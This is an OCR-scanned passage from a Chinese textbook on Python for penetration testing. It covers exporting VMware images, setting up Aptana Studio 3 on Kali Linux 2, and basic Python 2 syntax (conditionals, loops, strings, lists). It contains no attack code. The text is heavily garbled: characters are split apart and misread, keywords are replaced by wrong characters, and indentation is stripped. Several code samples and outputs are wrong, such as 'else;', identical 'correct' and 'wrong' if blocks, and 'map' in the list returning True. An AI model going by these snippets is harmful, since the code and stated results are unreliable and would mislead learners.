当 希 望 将 自己 所 使 用 的 虚拟 机 映像 转移 到 其 他 计算 机 上 ， 或 者 提供 给 其 他 人 使 用 的 时 候 
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(就 像 Kali 官方 提供 的 映像 那样 )， 也 可 以 选择 将 虚拟 机 导出 成 一 个 文件 ， 这 个 文件 移动 到 其 
他 任何 一 个 装 有 VMware 的 计算 机 上 都 可 以 运行 。 

操作 的 方法 是 首先 在 左 侧 操作 系统 列表 中 选中 目标 系统 ， 注 意 此 时 的 系统 应 该 处 于 关闭 
状态 ， 然 后 单 击 菜单 栏 上 的 “文件 ”一 “导出 为 OVF”， 在 弹出 的 文件 对 话 框 中 选中 要 保存 
的 位 置 。 生 成 的 OVF 文件 就 可 以 在 其 他 装 有 VMware 的 计算 机 中 运行 了 。 


小 结 


本 章 首先 详细 讲解 了 Kali Linux 2 的 安装 和 使 用 。Kali Linux 2 提供 了 多 种 安装 方法 ， 可 
以 将 其 安装 在 硬盘 上 ， 也 可 以 将 其 安装 在 随身 的 可 盘 上 。 

接 下 来 介绍 了 Kali Linux 2 的 一 些 基础 操作 ， 包 括 如 何 安装 第 三 方 软件 ， 更 改 程序 菜单 ， 
对 系统 进行 升级 ， 为 系统 配置 网 络 等 操作 。 

最 后 还 介绍 了 建立 渗透 测试 实验 室 的 关键 软件 一 一 VMware 的 安装 和 使 用 ， 详 细 讲 解 了 
VMware 中 网 络 模式 的 配置 、 靶 机 的 安装 、 快 照 和 克隆 等 操作 。 

在 第 3 章 将 会 正式 开始 Python 的 网 络 安 全 渗透 测试 之 旅 ， 首 先 要 学 习 Python 编程 的 基 
础 知识 。 


CHAPTER 


03 Pynonismsa 


在 开始 网 络 安全 渗透 的 工作 之 前 ， 作 者 曾 有 很 长 一 段 时间 的 编程 经 历 。 在 这 些 时 间 里 ， 
作者 接触 了 大 量 的 编程 语言 ， 见 证 了 很 多 语言 的 兴起 ， 也 见证 了 很 多 语言 的 由 盛 而 衰 。 

一 般 来 说 ， 一 个 国内 高 校 计算 机 专业 (软件 专业 ) 的 学 生 在 毕业 前 会 学 习 至 少 4 门 编程 
语言 。 非 计算 机 专业 的 理工 科学 生 也 会 学 习 一 门 编程 语言 。 长 期 以 来 ， 大 家 都 习惯 于 把 “C 
语言 ”作为 编程 的 基础 课程 ， 当 然 C 语言 的 强大 是 毋庸 置疑 的 ， 但 是 C 语言 本 身 是 一 门 相当 
复杂 的 语言 ， 如 果 没 有 长 时 间 的 学 习 和 练习 ， 极 少 有 人 能 真正 地 掌握 这 门 语言 。 也 可 以 这 样 
说 ,很 多 人 都 是 怀 着 一 腔 热 血 开 始 学 习 编 程 ， 但 是 却 倒 在 了 C 语言 这 座高 山 的 前 面 。 

对 于 大 多 数 人 来 说 ， 其 实 需要 一 门 简单 易学 ， 最 好 是 和 自然 语言 接近 的 语言 。 那 么 哪 种 
语言 更 合适 呢 ? 这 个 问题 可 能 会 有 很 多 种 答案 。 

在 作者 刚 开始 接触 网 络 安全 渗透 时 ， 经 常 要 访问 国外 的 黑客 论坛 ， 那 时 作者 很 惊讶 地 发 
现 国外 的 黑客 基本 上 大 都 在 使 用 Python 这 门 语言 。 之 后 作者 也 很 快感 受到 了 Python 这 门 语 
言 的 魅力 ， 原 本 动 轰 上 百 行 的 代码 ， 使 用 Python 仅 十 几 行 就 可 以 完成 。 这 样 最 大 的 好 处 就 是 
可 以 将 大 部 分 精力 放 在 程序 思路 的 设计 上 ， 而 不 是 实现 的 细节 上 。 可 以 说 Python 是 一 门 可 以 
让 大 多 数 人 轻松 掌握 的 编程 语言 。 在 本 章 中 将 就 以 下 几 点 展开 学 习 。 

(1 ) Python 语言 的 基础 。 

(2) £ Kali Linux 2 系统 上 安装 Python 编程 环境 。 

(3 ) Python 语言 中 的 常见 数据 类 型 。 

(4) Python 语言 中 的 基本 结构 。 

(5) Python 语言 中 的 常用 函数 。 
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3.1 Python 语言 基础 


在 2017 年 7 月 IEEE 发 布 的 编程 语言 排行 榜 上 ，Python 位 居 榜 首 。Python 语言 其 实 已 
经 并 不 年 轻 了 ， 它 于 1989 ch Python 的 本 意 是 大 蟒蛇 。 不 过 前 些 年 国内 
的 用 户 并 不 多 ， 使 用 者 大 都 是 外 国人 。 这 个 原因 也 与 编程 语言 的 分 类 有 点 儿 关系 ,在 很 长 一 
段 时 间 里 ， vied 言 ， 而 不 重视 解释 型 语言 ， 而 Python 恰好 就 是 一 门 
解释 型 的 语言 。 但 是 近年 来 Python 语言 在 国内 的 地 位 却 日 益 重 要 起 来 ， 这 是 因为 Python 的 
优势 十 分 明显 ， 语 法 简单 ， 功 能 强大 。 相 比 起 学 习 周 期 长 的 编程 语言 来 说 ， 很 多 人 在 经 过 几 
周 的 训练 后 ， 就 可 以 编写 出 功能 强大 的 工具 。 

有 些 人 把 Python 看 作 是 一 门 胶水 语言 ， 这 是 因为 它 可 以 将 各 种 强大 的 模块 (可 以 是 其 他 
语言 编写 ) 组 合 在 一 起 ， 这 一 点 为 程序 的 编写 者 节省 了 大 量 的 时 间 和 精力 ， 就 如 同 站 在 巨人 
的 肩膀 上 一 样 

另外 ，Python 本 身 也 在 不 断 改 进 中 ， 每 隔 一 段 时 间 就 会 推出 新 的 版 本 ， 在 新 的 版 本 中 会 
对 常见 的 语法 进行 修改 。 目 前 比较 常 使 用 的 版 本 就 是 Python 2.7 和 了 Python 3.6， 这 是 两 个 比 
较 有 代表 性 的 版 本 。 一 般 来 说 ， 编 程 语言 在 版 本 更 新 时 都 会 向 下 兼容 ， 也 就 是 一 个 程序 或 者 
类 模块 更 新 到 较 新 的 版 本 后 ， 用 旧 的 版 本 程序 创建 的 文档 或 系统 仍 能 被 正常 操作 或 使 用 。 但 
是 在 Python 3 推出 的 时 候 ， 并 没有 考虑 向 下 兼容 Python 2， 这 也 是 为 了 避免 带 入 过 多 的 累 歼 
从 而 使 得 Python 3 变 成 一 个 庞然大物 

但 是 Python 2 在 此 之 前 已 经 积累 了 大 量 的 用 户 ， 而 且 这 些 用 户 并 没有 感觉 到 有 放弃 
Python 2 的 必要 ， 同 时 Python 2 也 拥有 了 大 量 优 秀 的 模块 文件 ， 而 这 些 模块 文件 很 多 都 没有 
及 时 推出 适合 Python 3 的 版 本 。 因 此 ， 现 在 的 Python 2 与 Python 3 并 存 于 这 个 世界 上 ， 而 且 
Python 2 显然 还 占有 更 大 的 优势 。 

考虑 到 第 三 方 模块 文件 的 兼容 性 ， 本 书 中 的 所 有 实例 都 采用 Python 2.7 进行 开发 。 


3.2 在 Kali Linux 2 系统 中 安装 Python 编程 环境 


Kali Linux 2 中 已 经 安装 好 Python 的 运行 环境 ， 打 开 一 个 终端 ， 在 里 面 输入 “ python”， 
就 可 以 启动 Python， 如 图 3-1 所 示 。 


root@kali: ~ ooo 


rch Terminal Help 
n 
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可 以 看 到 当前 所 使 用 的 Python 版 本 号 为 2.7.13。 但 是 在 命令 行 中 进行 编程 不 是 很 方便 ， 
最 好 下 载 一 个 功能 更 为 强大 的 Python 开发 工具 。 

由 于 现在 Python 极为 热门 ， 因 此 这 门 语言 的 开发 工具 数量 众多 。 本 书 中 的 实例 都 采用 了 
Aptana Studio 3。 这 款 开 发 工具 的 下 载 地 址 为 www.aptana.com， 如 图 3-2 所 示 。 


Aptana Studio 3 


rg 
DOWNLOAD 
APTANA STUDIO 3 


Build web applications quickly and easily using the industry's leading web application IDE 
Aptana Studio harnesses the flexibility of Eclipse and focuses it into a powerful web 
development engine 


图 3-2 Aptana Studio 3 的 下 载 页 面 


单 击 右 侧 蓝 色 的 DOWNLOAD APTANA STUDIO 3 按钮 ， 就 会 进入 这 个 文件 的 下 载 界面 ， 


如 图 3-3 所 示 


Download Aptana Studio 3.6.1 eras 


Aptana Studio 3.6.1 
Linux, x86 


Looking tor a different OS, download format. or architecture? 


DOWNLOAD 
APTANA STUDIO 3 


图 3-3 Aptana Studio 3 的 下 载 界 面 


进入 这 个 界面 之 后 ， 需 要 注意 在 方 框 1 处 显示 的 版 本 ,默认 显示 的 是 Mac 系统 ， 而 这 里 
举例 使 用 的 系统 是 Kali Linux 2， 这 时 可 以 单 击 方 框 3 处 的 Customize Your Download 按钮 ， 
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之 后 该 网 页 就 会 出 现 和 系统 相 匹配 的 安装 文件 (可 能 需要 等 一 段 时 间 )。 在 方 框 2 处 ， 需 要 选 
择 使 用 独立 运行 的 版 本 还 是 一 个 Eclipse 的 插件 ， 这 里 使 用 默认 的 Standalone Version， 也 就 
是 可 以 独立 运行 的 版 本 。 在 方 框 4 中 输入 电子 邮箱 的 地 址 。 之 后 就 可 以 单 击 下 方 的 蓝 色 按钮 
开始 下 载 了 ， 如 图 3-4 所 示 。 

这 个 文件 默认 被 保存 到 Downloads 目录 中 ， 如 图 3-5 所 示 。 


图 3-4 开始 下 载 Aptana Studio 3 图 3-5 下 载 之 后 的 Aptana Studio 3 
双击 这 个 文件 可 以 对 这 个 文件 进行 解压 缩 ， 并 产生 一 个 同名 的 文件 来， 如 图 3-6 所 示 。 
Cs [al=laleee 
O Recent 
Q Home 
üa Destop H 
Douee | D W = 
= se sam sam Cm. 
A Muse 
a EDEM m 
EJ Videos iconxpm  notice.html p2 plugins readme 
(@ Trash 


3-6 Aptana Studio 3 的 启动 方式 


双击 这 个 目录 中 的 Aptana Studio 3 可 以 启动 这 个 开发 工具 。 首 先 设置 默认 的 工作 目录 ， 
如 图 3-7 所 示 。 


Aptana Studio 3 stores your projects n a folder called a workspace. 
Choose a workspace folder to use for this session. 


图 3-7 设置 Aptana Studio 3 的 工作 目录 


46 2> Python 渗透 测试 编程 技术 : 方法 与 实践 


默认 目录 设置 完成 之 后 ， 单 击 右 下 角 的 OK 按钮 ， 进入 Aptana Studio 3 的 开发 界面 ， 如 
图 3-8 所 示 。 


CEN . 


Embedded browser not available 
Open file using the sy jtor 


Problem Details 
The embedded browser widget for this editor cannot be created. It is either not available for 
your operating system or the system needs to be configured in order to support embedded 

browser. 


ee] 


图 3-8 Aptana Studio 3 的 开发 界面 


Aptana Studio 3 可 以 使 用 多 种 语言 进行 开发 ， 这 里 需要 使 用 它 来 开发 Python 程序 ， 对 这 个 
编辑 器 进行 设置 ， 首 先 单 击 菜单 栏 上 的 Window 按钮 ， 然 后 在 下 拉 菜单 中 选中 Preferences, 
如 图 3-9 所 示 。 

然后 在 打开 的 Preferences 对 话 框 中 左 侧 依次 选中 PyDev 一 Interpreters 一 Python 
Interpreter， 打 开 Python 的 设置 对 话 框 ， 如 图 3-10 所 示 。 


[wndow | 


New Window 
New Editor 


Hide Toolbar == 
| Open Perspective 
Show View 


Customize Perspective... 
Save Perspective As... 


Reset Perspective... 
Close Perspective 
Close All Perspectives 


Navigation 


Preferences 


1 Web - Aptana Studio 3 
* 2 Web - Aptana Studio Start Page - Aptana ... 


图 3-9 打开 Preferences 对 话 框 3-10 打开 Python 的 设置 对 话 框 


然后 在 弹出 的 Preferences 设置 对 话 框 中 单 击 Advanced Auto-Config 按钮 ， 如 图 3-11 
所 示 。 
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图 3-11 单 击 Advanced Auto-Config 按钮 


Aptana Studio 3 会 检测 当前 系统 中 安装 的 Python 版 本 ， 由 于 Python 2 和 Python 3 之 间 
的 差别 较 大 ， 所 以 这 里 的 选择 一 定 要 准确 。 这 里 选择 Python 2.7， 如 图 3-12 所 示 。 
在 弹出 的 对 话 框 中 单 击 OK 按钮 ， 如 图 3-13 所 示 。 


lusr/bin/python3.5 


E  usrfib/python2 7/plat-i386-Lnux-gny 
E @ /usr/lb/python2 7/b-tk 

8 ë /usr/lib/python2 7/tb-dynload 

W @ IusrñocaAb/python2 7Idist-peckages 


E ë /usrfib/python2 7/dist-packaqes 

E @ usrñb/python2 7/dst-packages/PILcompat 
E Ð lusrñib/python2 7/dist-packages/gtk-2.0 

E @ usrñb/python2 7/dst-packages/w-3.0-gtk2 


3-12 选择 Python 2.7 作为 开发 版 本 3-13 ”指定 要 使 用 的 模块 文件 


到 此 设置 完成 ， 现 在 可 以 使 用 Aptana Studio 3 来 编写 Python 程序 了 。 

接 下 来 创建 一 个 Python 程序 ， 首 先 单 击 菜单 栏 上 的 File 按钮 ， 依 次 选择 New 一 
Project…， 如 图 3-14 所 示 。 

在 弹出 的 New Project 设置 对 话 框 中 依次 选择 PyDev 一 PyDev Project， 然 后 单 击 Next 按钮 ， 
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如 图 3-15 所 示 。 


3-14 依次 选择 New 一 Project… 3-15 ”依次 选择 PyDev — PyDev Project 


在 弹出 的 PyDev Project 对 话 框 中 设置 项 目的 详细 信息 。 这 里 面包 括 项 目的 名 称 、 项 
目的 保存 位 置 、 项 目的 类 型 、 所 使 用 的 Python 语言 的 版 本 、 所 使 用 的 解释 器 等 ， 如 图 3-16 
所 示 。 


图 3-16 创建 一 个 项 目 
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单 击 Finish 按钮 之 后 就 创建 好 了 一 个 名 为 “test” 的 项 目 了 ， 现 在 向 这 个 项 目 中 添加 一 
个 文件 ， 如 图 3-17 所 示 。 


| Refresh 
Qose Project 

| Cose Urvelated Projects 
Debug As 


图 3-17 使 用 菜单 创建 项 目 
输入 要 创建 Python 文件 的 名 称 ， 然 后 单 击 Finish 按钮 即 可 完成 创建 ， 如 图 3-18 所 示 。 


Create a new file resource. 


图 3-18 输入 程序 的 名 称 
在 编辑 窗口 中 的 工作 区 处 输入 程序 ， 如 图 3-19 所 示 。 


如 果 要 运行 这 个 程序 ， 可 以 单 击 菜单 栏 上 的 Run 按钮 ， 然 后 选择 弹出 菜单 的 Run 选项 ， 
或 者 直接 按 Ctrl+F11 组 合 键 ， 如 图 3-20 所 示 。 
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3-19 Aptana Studio 3 的 工作 界面 


在 弹出 的 Run As 对 话 框 中 选中 Python Run， 然 后 单 击 OK 按钮 来 运行 这 个 程序 ， 如 
图 3-21 所 示 。 


myFirstpython 4 “PU 
1 print "Hetto, | Run History 
Run As 
Run Configurations... 
Debug History 
Debug As 
Debug Configurations... 
Ruby Exception Breakpoint 
Manage Python Exception Breakpoints 
Disable Step into properties 


External Tools 
图 3-20 选择 弹出 菜单 中 的 Run 选项 图 3-21 使 用 Python Run 运行 程序 
这 个 程序 执行 的 结果 会 在 下 方 的 Console 处 显示 ， 如 图 3-22 所 示 。 


P) myFirstPython x 
1 print "Hello,Pythonr 


terminated> /root/Documents/Aptana 
Hello, Python 


3-22 ”程序 执行 的 结果 
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3.3 编写 第 一 个 Python 程序 


除了 使 用 下 载 的 编辑 器 以 外 ，Python 的 工作 环境 中 提供 了 交互 式 的 编程 模式 ， 输 入 命 
令 并 按 下 回 车 键 之 后 立刻 可 以 看 到 效果 。 这 种 工作 方式 可 以 帮助 读者 更 加 清楚 地 了 解 Python 
的 原理 。 因 为 本 书 介绍 的 程序 主要 应 用 于 网 络 方面 ， 在 这 一 点 上 ，Linux 的 性 能 要 远 远 高 于 
Windows， 所 以 接 下 来 介绍 的 所 有 程序 ， 如 无 特殊 说 明 ， 都 是 在 Kali Linux 2 系统 的 编程 环 
境 中 实现 的 。 

首先 在 Kali Linux 2 中 打开 一 个 终端 ， 如 图 3-23 所 示 


图 3-23 在 KaliLinux 2 中 打开 一 个 终端 
然后 输入 “python ”启动 交互 式 编程 模式 ， 如 图 3-24 所 示 


root@kali: ~ 
Fie Edit View Search Terminal Help 


for more information 


图 3-24 启动 Python 的 交互 式 编程 模式 
从 图 3-24 中 可 以 看 出 当前 使 用 Python 的 版 本 为 2.7.13。 这 就 是 Python 的 命令 行 工作 
模式 ， 在 这 种 模式 下 ， 输 入 Python 语句 之 后 按 回 车 键 就 会 立刻 执行 。 可 以 在 命令 行 中 使 用 
print 函数 来 打印 输出 一 些 内 容 ， 例 如 使 用 如 下 语句 。 
>>> print "Hello ,welcome to Python world" 
然后 按 回 车 键 ， 在 命令 行 的 工作 模式 下 ， 回 车 键 不 仅 是 换行 ， 同 时 也 意味 着 执行 ， 上 面 
语句 的 输出 结果 如 图 3-25 所 示 。 


) Python world 


图 3-25 在 命令 行 中 使 用 print 函数 打印 输出 
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另外 也 可 以 像 编 译 型 语言 (如 C 语言 ) 一 样 ， 将 一 个 程序 全 部 写 完 以 后 再 执行 。 这 种 模 
式 在 调试 的 时 候 可 能 有 些 麻 烦 ， 但 是 可 以 实现 更 完善 的 功能 ， 而 且 具 备 了 可 移植 性 。 但 是 这 
需要 使 用 专门 的 开发 环境 ， 本 书 中 的 实例 都 采用 了 前 面 介绍 的 Aptana Studio 3 作为 开发 环境 。 

添加 注释 是 书写 程序 的 好 习惯 ,这样 当 你 完成 了 一 个 程序 之 后 ， 别 人 就 清楚 你 编写 每 一 
行 代码 的 目的 。 这 一 点 在 团队 协作 的 时 候 尤 为 重要 ， 注 释 语句 不 会 参与 程序 的 执行 。 因 此 也 
有 一 些 程序 员 在 临时 删除 一 段 代 码 的 时 候 ， 会 使 用 注释 的 方式 来 禁用 这 段 代码 。 例 如 : 

# Copyright (C) 2001-2006 Python Software Foundation 


如 果 要 对 多 行 代码 进行 注释 ， 只 需要 在 每 行 前 面 放 一 个 # 就 可 以 了 。 例 如 : 


# Copyright (C) 2001-2006 Python Software Foundation 
# Author: somebody 
# Contact: somebody @python.org 


34 选择 结构 


如 果 读 者 有 其 他 编程 语言 的 基础 ， 那 么 会 觉得 Python 很 容易 上 手 。 常 见 的 编程 语言 都 
有 三 大 结构 : 顺序 结构 、 选 择 结构 和 循环 结构 。 其 中 ， 顺 序 结构 是 一 句 接着 一 句 执行 的 ， 因 
而 很 少 会 特别 注意 到 这 种 结构 。 而 选择 结构 的 特点 则 会 绕 过 一 些 语句 执行 。 最 为 常用 的 选择 
结构 语句 为 让 语句 。 在 Python 语法 中 ,一 条 让 语句 由 以 下 两 个 部 分 组 成 。 

(1) 条 件 语句 : 这 是 一 个 可 能 为 真 也 可 能 为 假 的 语句 ， 由 让 关键 字 作 为 开始 ， 由 冒号 结 
Jë, 例如: 


if Scores==100: 
注意 : 它 与 C 语 言 最 大 的 不 同 之 处 在 于 这 里 面 的 条 件 语句 没有 括号 。 


(2 ) 代码 块 : 这 是 一 段 可 以 执行 的 代码 ， 当 条 件 语句 的 值 为 真 的 时 候 ， 就 会 执行 这 个 代 
码 块 。 特 别 需 要 注意 的 是 ，Python 语句 中 的 代码 块 并 没有 使 用 常见 的 大 括号 ， 而 是 采用 缩 进 
的 方式 ， 很 多 熟练 使 用 其 他 语言 的 程序 员 对 此 可 能 并 不 习惯 。Python 中 的 缩 进 会 影响 程序 的 
编译 ， 这 一 点 必须 要 牢记 。 


if Scores==100: 
print "Well done" 


上 面 是 正确 的 写法 ， 而 下 面 的 这 种 写法 是 错误 的 。 注 意 : 两 者 的 区 别 仅仅 在 于 缩 进 。 


if Scores==100: 
print "Well done" 
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有 些 时 候 ， 仅 使 用 寺 并 不 能 实现 预期 的 功能 ， 例 如， 希望 当 Scores 的 值 等 于 100 的 时 
Ë, 输出 “Well done”， 但 是 在 不 等 于 100 的 时 候 ， 输 出 “ Work harder”"， 这 时 就 需要 再 使 
用 else 语句 。else 无 须 青 使 用 条 件 语句 ， 它 等 价 于 让 后 面 的 条 件 语句 为 假 。 
if Scores==100: 
print "Well done" 


else; 
print "Work harder" 


再 复杂 一 点 儿 ， 考 虑 分 数 为 100、 分 数 不 为 100 但 大 于 60、 分 数 小 于 60 三 种 情况 ， 单 
单 使 用 过 和 else 就 显得 无 能 为 力 了 。 这 里 面 还 需要 考虑 分 数 不 为 100 时 ， 是 否 大 于 60 这 个 
问题 。elif 语 句 其 实 可 以 看 作 else 加 站 的 合体 。 

if Scores==100: 

print "Well done" 


elif Scores>=60: 
print "Work harder" 


else: 


print "make great efforts" 


当 情 况 更 为 复杂 的 时 候 ， 需 要 使 用 更 多 的 elif。 但 是 无 论 如 何 ， 一 个 选择 结构 只 有 一 个 
这， 代表 其 他 条 件 的 elif 都 在 让 语句 之 后 ， 如 果 希 望 确保 至 少 会 执行 其 中 一 条 ， 就 要 在 最 后 
加 上 else 语句 。 


3.5 循环 结构 


在 日 常生 活 中 经 常会 遇 到 一 些 有 规律 的 重复 操作 ， 例 如 ， 输 出 从 1 到 100 的 自然 数 。 如 
果 使 用 顺序 结构 来 实现 这 个 程序 ， 那 么 需要 使 用 100 个 print 语句 。 其 实 这 些 语 句 都 是 重复 
执行 的 ， 也 只 需要 使 用 一 个 循环 语句 就 可 以 代替 这 100 个 语句 。 在 Python 中 的 循环 语句 也 有 
while 和 for 两 种 ， 首 先 来 看 一 下 while 的 用 法 ，while 循环 语句 包含 以 下 两 个 部 分 。 

(1) 条 件 语句 : 这 是 一 个 可 能 为 真 也 可 能 为 假 的 语句 ， 由 while 关键 字 作 为 开始 ， 由 冒 
号 结尾 ， 例 如 下 面 这 句 。 

while i<100: 

(2 ) 代码 块 : 这 是 一 段 可 以 执行 的 代码 ， 当 条 件 语 句 的 值 为 真 的 时 候 ， 就 会 执行 这 个 代 
码 块 。 同 样 需要 注意 的 也 是 缩 进 的 格式 。 


while i<100: 
print i 


和 选择 结构 不 同 的 是 ， 当 代码 块 执行 完 之 后 ， 并 不 是 继续 向 下 执行 ， 而 是 要 重新 返回 到 


54 2> Python 渗透 测试 编程 技术 : 方法 与 实践 


while 循环 的 条 件 语 句 处 ， 再 次 检查 该 条 件 的 值 ， 如 果 条 件 为 真 ， 就 会 再 次 执行 代码 块 ， 否 
则 会 跳 过 整个 代码 块 。 

如 果 这 个 条 件 语句 的 结果 永远 为 假 ， 那 么 代码 块 中 的 语句 将 不 会 执行 。 可 是 如 果 这 个 条 
件 语句 的 结果 永远 为 真 呢 ? 例 如 : 


while 1==1: 
print "Never stop" 


这 种 循环 永远 都 不 会 结束 ， 显 然 并 不 会 需要 一 个 程序 永远 处 于 运行 状态 ， 它 总 得 有 个 结 
束 的 时 候 。 这 时 就 需要 使 用 break 语句 了 ， 它 的 作用 就 是 停止 这 个 循环 。 接 下 来 编写 一 个 程 
序 ， 要 求 用 户 输入 用 户 名 ， 但 是 只 有 当 用 户 的 输入 为 aamin 时 ， 才 会 进行 下 一 步 。 

while 1: 

print "what is your name ? " 
name=input () 
if name=='admin': 


break 
print'welcome' 


这 里 面 使 用 了 input 函数 ， 这 是 一 个 非常 有 用 的 函数 ， 它 可 以 在 执行 的 时 候 从 命令 行 处 
接收 来 自用 户 的 输入 ， 并 将 这 个 输入 传递 给 正在 执行 的 程序 。 

除了 break 语句 之 外 ， 还 有 一 个 功能 类 似 的 continue 语句 ， 它 也 只 能 应 用 于 循环 内 部 。 
不 同 的 是 ， 当 程序 执行 遇 到 continue 语句 的 时 候 ， 就 会 马上 跳 回 到 循环 开始 的 地 方 ， 重 新 对 
循环 条 件 求 值 ， 也 就 是 继续 这 个 循环 。 

不 过 Python 中 while 循环 的 用 法 和 其 他 语言 (如 C 语言 ) 的 区 别 并 不 大 ， 而 另 一 个 for 
循环 就 有 些 不 同 了 。 

for 循环 又 称 为 计数 循环 ， 这 是 因为 可 以 在 条 件 语 句 中 指定 循环 的 次 数 。for 语句 要 和 
range() 函数 搭配 使 用 ， 常 见 的 形式 如 : 

for i in range (10): 

for 语句 的 构成 部 分 主要 由 以 下 两 个 部 分 组 成 。 

(1) 循环 语句 : 这 是 由 一 个 for 关键 字 、 一 个 变量 名 、 一 个 in 关键 字 、 一 个 range() 方 
法 和 一 个 冒号 共同 构成 的 语句 ， 这 个 range) 函数 中 可 以 接受 参数 ， 最 多 三 个 参数 。 

(2 ) 代码 块 : 这 是 一 段 可 以 执行 的 代码 。 

这 里 需要 注意 的 是 range) 本 身 就 是 一 个 函数 ， 如 果 只 接受 一 个 参数 ， 如 range(n)， 则 表 
示 的 是 执行 代码 块 的 次 数 。 


for i in range (5): 
print i 
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而 如 果 里 面 是 两 个 参数 ， 如 range (5,10 )， 则 第 一 个 参数 表示 的 是 for 循环 开始 的 值 ， 
第 二 参数 表示 上 限 ， 但 是 循环 中 i 的 值 不 会 取 到 10。 


for i in range (5,10): 
print i 


range() 函数 也 可 以 有 第 三 个 参数 ， 前 两 个 参数 分 别 是 开始 值 和 上 限 ， 第 三 个 参数 是 步 
长 ， 也 就 是 每 次 循环 时 循环 变量 的 变化 。 


for i in range (2,10,2): 
print i 


36 数字 和 字符 串 


Python 中 提供 了 5 个 标准 的 数据 类 型 一 一 数字 、 字 符 串 、 列 表 、 元 组 和 字典 。Python 中 
支持 的 数字 类 型 主要 有 三 种 ， 分 别 是 int. long 和 float。 这 些 数 字 支 持 常见 的 数学 运算 。 这 里 
面 int 代表 的 就 是 整数 ， 常 见 的 没有 小 数 点 的 数 就 是 整数 ，Python 的 命令 行 可 以 用 来 充当 一 
个 计算 器 。 


>>> 100+1 
101 


而 平时 所 用 的 实数 在 Python 中 就 是 float 类 型 。 


>>> 100.2+9 
109.2 


另外 ，Python 有 时 需要 处 理 一 些 较 大 的 整数 ， 这 时 就 需要 使 用 到 长 整数 ， 长 整数 的 写法 
是 在 后 面 添 加 一 个 工 。 

>>> 9999999999999999999999999999999999 

9999999999999999999999999999999999L 

在 Python 中 输入 字符 串 很 简单 ， 只 需要 用 引号 开始 和 结束 ， 例 如 This is a test's Python 
中 的 字符 串 是 一 种 相当 灵活 的 数据 类 型 ， 它 支持 很 多 运算 符 和 方法 。 首 先 介绍 一 下 常见 的 字 
符 串 运算 符 。 

(1 ) +， 这 个 运算 符 在 操作 两 个 数字 时 是 相 加 的 意思 ， 在 操作 两 个 字符 串 的 时 候 则 表示 
连接 的 意思 ， 例 如 : 


>>> 'Penetration '+'Test' 


'Penetration Test' 


(2) *， 这 个 运算 符 在 操作 两 个 数字 时 是 相 乘 的 意思 ， 不 能 应 用 于 两 个 字符 串 。 不 过 ， 
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一 个 字符 串 可 以 与 一 个 整数 进行 * 操作 ,表示 将 这 个 字符 串 重复 n 次。 


>>> "Penetration '*3 
'Penetration Penetration Penetration ' 


(3 ) []， 这 个 运算 符 很 灵活 地 将 字符 串 看 作 类 似 C 语言 数组 (相信 本 书 的 读者 都 应 该 会 
有 一 点 儿 C 语言 的 基础 ， 不 过 没有 也 没关系 )。 例 如 ， 一 个 字符 串 'Hello Python' 就 支持 以 下 
的 操作 ， 这 里 面 的 “-1” 是 一 个 特殊 的 参数 ， 表 示 最 后 一 个 字符 。 


>>> a='Hello Python' 
>>>a[0] 

'H' 

>>>a [2] 

1 

>>>a[-1] 

In’ 


(4) [:]， 这 个 运算 符 用 来 得 到 一 个 子 字符 串 ， 使 用 两 个 下 标 来 指定 一 个 范围 ， 包 含 从 开始 
下 标 到 结束 下 标 之 间 包 含 的 字符 ， 包 括 开 始 下 标 代表 的 字符 ,但 不 包括 结束 下 标 代表 的 字符 。 


>>> a='Hello Python' 
>>>a[0:5] 

"Hello" 

>>>a[:5] 

'Hello' 

>>>a[6:] 

'python' 


(5 ) mn， 这 个 运算 符 用 于 两 个 字符 串 ， 如 果 第 二 个 字符 串 包含 第 一 个 字符 串 ， 则 返回 
True， 和 否则 返回 False. 


>>> "He" in "Hello Python" 
True 
>>> "he" in "Hello Python" 
False 


(6) not in， 这 个 运算 符 也 用 于 两 个 字符 串 ， 运 算 结 果 与 in 相反 。 
>>> "He" not in "Hello Python" 
False 


>>> "he" not in "Hello Python" 
True 


3.7 列表、 元 组 和 字典 
数学 上 ， 序 列 是 被 排 成 一 列 的 对 象 (或 事件 )， 这 样 每 个 元 素 不 是 在 其 他 元 素 之 前 ， 就 是 
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在 其 他 元 素 之 后 。 在 Python 中 ,序列 是 最 基本 的 数据 结构 。 在 Python 中 最 为 常见 的 序列 是 
列表 和 元 组 ， 这 些 序列 提供 了 很 多 便利 的 操作 。 


3.7.1 列表 


首先 看 一 下 列表 ， 列 表 以 左 括号 开始 ， 右 括号 结束 ， 样 式 为 [Nmap', 'Kali', 'Openvas'], 
列表 中 数据 项 的 类 型 无 须 相 同 ， 这 一 点 对 于 具有 一 些 其 他 语言 基础 的 读者 来 说 ， 可 能 有 些 不 
习惯 ,不 过 这 也 是 Python 语言 灵活 性 的 体现 。 对 一 个 列表 而 言 ， 可 以 进行 如 下 操作 。 

(1 ) 列表 的 创建 。 创 建 一 个 以 tools 为 名 的 列表 。 

>>>tools=['Nmap', 'Kali', 'Openvas'] 

C2) 使 用 下 标 来 访问 和 更 新 列表 。 只 要 使 用 下 标 就 可 以 对 列表 中 的 元 素 进行 读 取 和 

>>>tools[0] 

'Nmap' 

>>>tools[2]='Metasploit' 


>>>tools 
['Nmap', "Kali'， 'Metasploit'] 


G) 使 用 切片 来 访问 列表 。 使 用 下 标 只 能 访问 到 单个 元 素 ， 使 用 切片 就 可 以 取得 多 个 元 
素 ， 得 到 一 个 新 的 列表 。 


>>>tools[1:3] 
['Kali', 'Metasploit'] 


在 一 个 切片 中 ， 第 一 个 整数 是 切片 开始 的 下 标 ， 第 二 个 整数 是 切片 结束 的 下 标 ， 但 是 不 
包括 这 个 下 标 。 
(4) 使 用 len0) 取得 列表 长 度 。 


>>>len (tools) 
3 


(5) 列表 的 连接 和 复制 操作 。 列 表 支 持 “+” 和 “*” 两 个 运算 符 ,“+” 表 示 连 接 运算 
符 ， 例 如 ， 将 tools 和 列表 ['Sqlmap', Burpsuite'] 组 成 一 个 新 的 列表 。 


>>> tools+['Sqlmap', 'Burpsuite'] 
['Nmap', 'Kali', 'Metasploit', 'Sqlmap', 'Burpsuite'] 


另外 ， 也 可 以 使 用 “* ”这 个 运算 符 来 实现 对 列表 的 复制 ， 例 如 将 这 个 列表 复制 三 次 。 


>>>tools*3 
['Nmap', 'Kali', ‘Metasploit', 'Nmap', 'Kali', 'Metasploit', 'Nmap', 'Kali', 
'Metasploit'] 
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(6) in 操作 符 与 not in 操作 符 ， 利 用 这 两 个 运算 符 可 以 确定 一 个 值 是 否 在 列表 中 。 


>>> 'map' in tools 

True 

>>> 'Nmap' not in tools 
False 

>>> 'Office' in tools 
False 

